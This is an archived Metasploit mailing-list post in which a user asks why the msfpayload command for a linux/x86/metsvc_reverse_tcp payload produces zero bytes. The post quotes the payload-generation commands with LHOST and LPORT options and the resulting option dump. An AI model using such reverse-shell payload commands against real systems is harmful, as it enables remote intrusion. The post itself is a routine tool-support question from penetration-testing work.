Metasploit mailing list archives
linux/x86/metsvc_reverse_tcp results 0 bytes long
From: Konrads Smelkovs <konrads () smelkovs com>
Date: Mon, 10 May 2010 11:05:38 +0300
konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/metsvc_reverse_tcp LHOST=127.0.0.1 LPORT=8081 X >out.elf Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/metsvc_reverse_tcp * Length: 0* Options: LHOST=127.0.0.1,LPORT=8081 konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/metsvc_reverse_tcp LHOST=127.0.0.1 LPORT=8081 P # linux/x86/metsvc_reverse_tcp - 0 bytes # http://www.metasploit.com # AutoRunScript=, LHOST=127.0.0.1, AppendExit=false, # AutoSystemInfo=true, PrependChrootBreak=false, # PrependSetresuid=false, InitialAutoRunScript=, # AutoLoadStdapi=true, PrependSetuid=false, LPORT=8081, # ReverseConnectRetries=5, PrependSetreuid=false *my $buf = * What am I doing wrong? -- Konrads Smelkovs Applied IT sorcery.
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- linux/x86/metsvc_reverse_tcp results 0 bytes long Konrads Smelkovs (May 10)
- Re: linux/x86/metsvc_reverse_tcp results 0 bytes long egypt (May 10)